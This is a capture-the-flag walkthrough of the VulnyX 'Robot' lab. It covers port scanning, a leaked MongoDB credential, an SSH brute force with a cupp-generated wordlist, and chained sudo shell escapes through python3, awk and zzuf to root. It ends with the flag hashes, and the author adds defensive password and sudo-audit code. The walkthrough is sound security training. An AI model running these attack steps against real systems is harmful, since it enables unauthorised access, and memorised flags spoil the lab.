Vlx_Robot

Target source: https://vulnyx.com/

Difficulty: Low

I. Information Gathering

1. Host Discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 15:58 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0012s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00079s latency).
MAC Address: 08:00:27:75:F0:11 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.54
Host is up (0.00061s latency).
MAC Address: 08:00:27:63:FD:83 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.50 seconds

Target IP: 192.168.2.54

2. Port Scanning

1) Full port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.54
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 15:59 +0800
Nmap scan report for 192.168.2.54
Host is up (0.00093s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
27017/tcp open mongod
MAC Address: 08:00:27:63:FD:83 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 12.66 seconds

Open ports: 22, 80, 27017

2) Detailed service scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,27017 192.168.2.54
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 16:00 +0800
Nmap scan report for 192.168.2.54
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Hello Friend
|_http-server-header: Apache/2.4.56 (Debian)
27017/tcp open mongodb MongoDB 5.0.21 4.1.1 - 5.0
| mongodb-databases:
| code = 13
| errmsg = command listDatabases requires authentication
| codeName = Unauthorized
|_ ok = 0.0
| mongodb-info:
| MongoDB Build info
| storageEngines
| 0 = devnull
| 2 = wiredTiger
| 1 = ephemeralForTest
| version = 5.0.21
| sysInfo = deprecated
| modules
| ok = 1.0
| maxBsonObjectSize = 16777216
| versionArray
| 0 = 5
| 3 = 0
| 2 = 21
| 1 = 0
| allocator = tcmalloc
| gitVersion = 4fad44a858d8ee2d642566fc8872ef410f6534e4
| bits = 64
| javascriptEngine = mozjs
| openssl
| running = OpenSSL 1.1.1n 15 Mar 2022
| compiled = OpenSSL 1.1.1n 15 Mar 2022
| buildEnvironment
| linkflags = -Wl,--fatal-warnings -pthread -Wl,-z,now -fuse-ld=gold -fstack-protector-strong -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,--compress-debug-sections=none -Wl,-z,origin -Wl,--enable-new-dtags
| ccflags = -Werror -include mongo/platform/basic.h -ffp-contract=off -fasynchronous-unwind-tables -ggdb -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -fno-omit-frame-pointer -fno-strict-aliasing -O2 -march=sandybridge -mtune=generic -mprefer-vector-width=128 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -Wa,--nocompress-debug-sections -fno-builtin-memcmp
| cc = /opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.5.0
| target_arch = x86_64
| cxxflags = -Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17
| cppdefines = SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS
| distarch = x86_64
| distmod = debian10
| target_os = linux
| cxx = /opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.5.0
| debug = false
| Server status
| code = 13
| errmsg = command serverStatus requires authentication
| codeName = Unauthorized
|_ ok = 0.0
MAC Address: 08:00:27:63:FD:83 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.51 seconds

3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.54
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 16:00 +0800
Nmap scan report for 192.168.2.54
Host is up (0.0010s latency).
All 100 scanned ports on 192.168.2.54 are in ignored states.
Not shown: 54 closed udp ports (port-unreach), 46 open|filtered udp ports (no-response)
MAC Address: 08:00:27:63:FD:83 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.29 seconds

II. Web Penetration

1. Website on Port 80

Browsing to port 80 shows a single image.

Download the image locally and inspect its metadata with exiftool.

┌──(root㉿kali)-[/tmp]
└─# exiftool image.jpg
ExifTool Version Number : 13.44
File Name : image.jpg
Directory : .
File Size : 682 kB
File Modification Date/Time : 2023:10:06 20:50:53+08:00
File Access Date/Time : 2026:01:21 16:20:13+08:00
File Inode Change Date/Time : 2026:01:21 16:19:05+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Comment : B4ckUp_3LLi0t/
Image Width : 1920
Image Height : 1080
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1920x1080
Megapixels : 2.1

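The Comment field reveals a directory, B4ckUp_3LLi0t/. Browsing to it shows another image. Downloading that file turns up nothing useful, so try directory enumeration.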

┌──(root㉿kali)-[/tmp]
└─# gobuster dir -u http://192.168.2.54/B4ckUp_3LLi0t/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.54/B4ckUp_3LLi0t/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: js,php,txt,html,bak,md,db
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 481]
connect.bak (Status: 200) [Size: 266]

This finds a backup file, connect.bak; download it.

┌──(root㉿kali)-[/tmp]
└─# cat connect.bak
<?php

$client = new MongoDB\Client(
'mongodb://127.0.0.1:27017'
[
'username' => 'mongo',
'password' => 'm0ng0P4zz',
'ssl' => true,
'replicaSet' => 'myReplicaSet',
'authSource' => 'admin',
'db' => 'elliot',
],
);

It contains the username and password for the MongoDB database.

2. MongoDB on Port 27017

Browsing to port 27017 returns a message saying it looks like you are trying to access MongoDB over HTTP on the native driver port.

The service scan showed that the MongoDB version is 5.0.21.

III. MongoDB

Connect using the MongoDB username and password.

┌──(root㉿kali)-[~/miaosec]
└─# mongo --host 192.168.2.54 -u mongo -p m0ng0P4zz elliot
MongoDB shell version v7.0.14
connecting to: mongodb://192.168.2.54:27017/elliot?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("46152d63-89ed-44e9-8b99-d538e661f1ee") }
MongoDB server version: 5.0.21
WARNING: shell and server versions do not match
================
Warning: the "mongo" shell has been superseded by "mongosh",
which delivers improved usability and compatibility.The "mongo" shell has been deprecated and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
https://community.mongodb.com
>

View the database information.

> show dbs
elliot 0.000GB
> use elliot
switched to db elliot
> show collections
elliot
> db.elliot.find()
{ "_id" : ObjectId("651fdd9171f44c265b976d17"), "FirstName" : "Elliot", "Surname" : "Alderson", "Nickname" : "MrRobot", "Birthdate" : "17091986" }

The recovered record hints that we should build a wordlist from it; generate one with cupp.

┌──(root㉿kali)-[~/miaosec]
└─# cupp -i
/usr/bin/cupp:146: SyntaxWarning: invalid escape sequence '\ '
print(" \ # User")
/usr/bin/cupp:147: SyntaxWarning: invalid escape sequence '\ '
print(" \ \033[1;31m,__,\033[1;m # Passwords")
/usr/bin/cupp:148: SyntaxWarning: invalid escape sequence '\ '
print(" \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m # Profiler")
/usr/bin/cupp:149: SyntaxWarning: invalid escape sequence '\ '
print(" \033[1;31m(__) )\ \033[1;m ")
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: Elliot
> Surname: Alderson
> Nickname: MrRobot
> Birthdate (DDMMYYYY): 17091986


> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):


> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):


> Pet's name:
> Company name:


> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]: y
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to elliot.txt, counting 4536 words.
[+] Now load your pistolero with elliot.txt and shoot! Good luck!

IV. Gaining Access as elliot

Use the generated wordlist to brute-force SSH.

┌──(root㉿kali)-[~/miaosec]
└─# hydra -t 64 -l elliot -P ./elliot.txt ssh://192.168.2.54 -F -I
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-21 17:30:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 4536 login tries (l:1/p:4536), ~71 tries per task
[DATA] attacking ssh://192.168.2.54:22/
[STATUS] 536.00 tries/min, 536 tries in 00:01h, 4038 to do in 00:08h, 26 active
[STATUS] 454.00 tries/min, 1362 tries in 00:03h, 3213 to do in 00:08h, 25 active
[STATUS] 414.14 tries/min, 2899 tries in 00:07h, 1678 to do in 00:05h, 23 active
[22][ssh] host: 192.168.2.54 login: elliot password: toillE71986
[STATUS] attack finished for 192.168.2.54 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-21 17:39:22

This finds the SSH password for user elliot: toillE71986
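
The password hydra recovered is the first name reversed followed by birthdate digits, all taken from the MongoDB record. As an added example (not part of the original write-up), this check rejects such passwords at the time they are set; the token set and the 0.5 threshold are assumptions chosen for illustration.

```python
# Constructed sample: the profile fields from the MongoDB record on this page.
PROFILE = {"FirstName": "Elliot", "Surname": "Alderson",
           "Nickname": "MrRobot", "Birthdate": "17091986"}  # DDMMYYYY

def profile_tokens(profile):
    """Lower-cased names (forward and reversed) plus birthdate fragments."""
    names = {profile.get(k, "").lower() for k in ("FirstName", "Surname", "Nickname")}
    tokens = names | {n[::-1] for n in names}
    b = profile.get("Birthdate", "")
    if len(b) == 8 and b.isdigit():
        # whole date, DD, MM, DDMM, YYYY, YY
        tokens |= {b, b[:2], b[2:4], b[:4], b[4:], b[6:]}
    return {t for t in tokens if len(t) >= 2}

def personal_fraction(password, profile):
    """Fraction of the password's characters covered by profile tokens."""
    pw = password.lower()
    covered = [False] * len(pw)
    for tok in profile_tokens(profile):
        start = pw.find(tok)
        while start != -1:
            covered[start:start + len(tok)] = [True] * len(tok)
            start = pw.find(tok, start + 1)
    return sum(covered) / len(pw) if pw else 0.0

def is_acceptable(password, profile, max_fraction=0.5):
    """Reject passwords that are mostly assembled from the owner's own data."""
    return personal_fraction(password, profile) <= max_fraction

if __name__ == "__main__":
    for candidate in ("toillE71986", "Alderson!", "c9#Vq2!mTz4w"):
        print(candidate, round(personal_fraction(candidate, PROFILE), 3),
              "ok" if is_acceptable(candidate, PROFILE) else "rejected")
```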

We now have access as user elliot.

┌──(root㉿kali)-[~/miaosec]
└─# ssh elliot@192.168.2.54
The authenticity of host '192.168.2.54 (192.168.2.54)' can't be established.
ED25519 key fingerprint is: SHA256:3dqq7f/jDEeGxYQnF2zHbpzEtjjY49/5PvV5/4MMqns
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.54' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
elliot@192.168.2.54's password:
elliot@robot:~$ id
uid=1000(elliot) gid=1000(elliot) grupos=1000(elliot)

V. Privilege Escalation

1. Gaining Access as darlene

Check sudo -l.

elliot@robot:~$ sudo -l
Matching Defaults entries for elliot on robot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on robot:
(darlene) NOPASSWD: /usr/bin/sh

We now have access as user darlene.

elliot@robot:~$ sudo -u darlene /usr/bin/sh
$ id
uid=1001(darlene) gid=1001(darlene) grupos=1001(darlene)
$ bash
darlene@robot:/home/elliot$

2. Gaining Access as angela

Check sudo -l.

darlene@robot:/home/elliot$ sudo -l
Matching Defaults entries for darlene on robot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User darlene may run the following commands on robot:
(angela) NOPASSWD: /usr/bin/python3

We now have access as user angela.

darlene@robot:/home/elliot$ sudo -u angela /usr/bin/python3  -c 'import os; os.execl("/bin/sh", "sh")'
$ bash
angela@robot:/home/elliot$ id
uid=1002(angela) gid=1002(angela) grupos=1002(angela)

3. Gaining Access as tyrell

Check sudo -l.

angela@robot:/home/elliot$ sudo -l
Matching Defaults entries for angela on robot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User angela may run the following commands on robot:
(tyrell) NOPASSWD: /usr/bin/awk

We now have access as user tyrell.

angela@robot:/home/elliot$ sudo -u tyrell /usr/bin/awk 'BEGIN {system("/bin/sh")}'
$ bash
tyrell@robot:/home/elliot$ id
uid=1003(tyrell) gid=1003(tyrell) grupos=1003(tyrell)

4. Gaining root Access

Check sudo -l.

tyrell@robot:/home/elliot$ sudo -l
Matching Defaults entries for tyrell on robot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tyrell may run the following commands on robot:
(root) NOPASSWD: /usr/bin/zzuf

zzuf can execute sh directly.

We now have root access.

tyrell@robot:/home/elliot$ sudo /usr/bin/zzuf  /bin/sh
id
uid=0(root) gid=0(root) grupos=0(root)
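
Each sudo rule above looks narrow on its own, but together they form a chain from elliot to root. As an added example (not part of the original write-up), this audit parses the rule lines, keeps those whose binary can start a shell, and searches for a path to root; `SHELL_CAPABLE` is an assumed list limited to the binaries this page shows, and `SUDO_L` is constructed from the four `sudo -l` outputs.

```python
import re
from collections import deque

# Assumption: only the binaries this page shows yielding a shell under sudo.
# A real audit needs a much fuller list.
SHELL_CAPABLE = {"sh", "python3", "awk", "zzuf"}

RULE = re.compile(r"\((?P<runas>[\w-]+)\)\s*(?P<tag>NOPASSWD:)?\s*(?P<cmd>/\S+)")

# Constructed input: the rule line from each `sudo -l` output on this page.
SUDO_L = {
    "elliot":  "(darlene) NOPASSWD: /usr/bin/sh",
    "darlene": "(angela) NOPASSWD: /usr/bin/python3",
    "angela":  "(tyrell) NOPASSWD: /usr/bin/awk",
    "tyrell":  "(root) NOPASSWD: /usr/bin/zzuf",
}

def build_edges(sudo_l):
    """Map each user to (runas, command, nopasswd) rules that can yield a shell."""
    edges = {}
    for user, text in sudo_l.items():
        for m in RULE.finditer(text):
            if m["cmd"].rsplit("/", 1)[-1] in SHELL_CAPABLE:
                edges.setdefault(user, []).append(
                    (m["runas"], m["cmd"], bool(m["tag"])))
    return edges

def path_to_root(edges, start):
    """Breadth-first search; return the (user, command, runas) hops or None."""
    queue, seen = deque([(start, [])]), {start}
    while queue:
        user, path = queue.popleft()
        if user == "root":
            return path
        for runas, cmd, _nopasswd in edges.get(user, []):
            if runas not in seen:
                seen.add(runas)
                queue.append((runas, path + [(user, cmd, runas)]))
    return None

def users_reaching_root(sudo_l):
    edges = build_edges(sudo_l)
    return sorted(u for u in sudo_l if path_to_root(edges, u))

if __name__ == "__main__":
    for hop in path_to_root(build_edges(SUDO_L), "elliot"):
        print("%s --[%s]--> %s" % hop)
```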

VI. Reading the Flags

cat /root/root.txt /home/elliot/user.txt
59d16127fbdecc2832a98726efe3af85
40f8c240d5151fa312d6f372b636a12a

Vlx_Robot
http://miao-sec.github.io/Vulnyx/Vlx_Robot/
Author: Miao
Published: January 21, 2026
License: BY-MIAO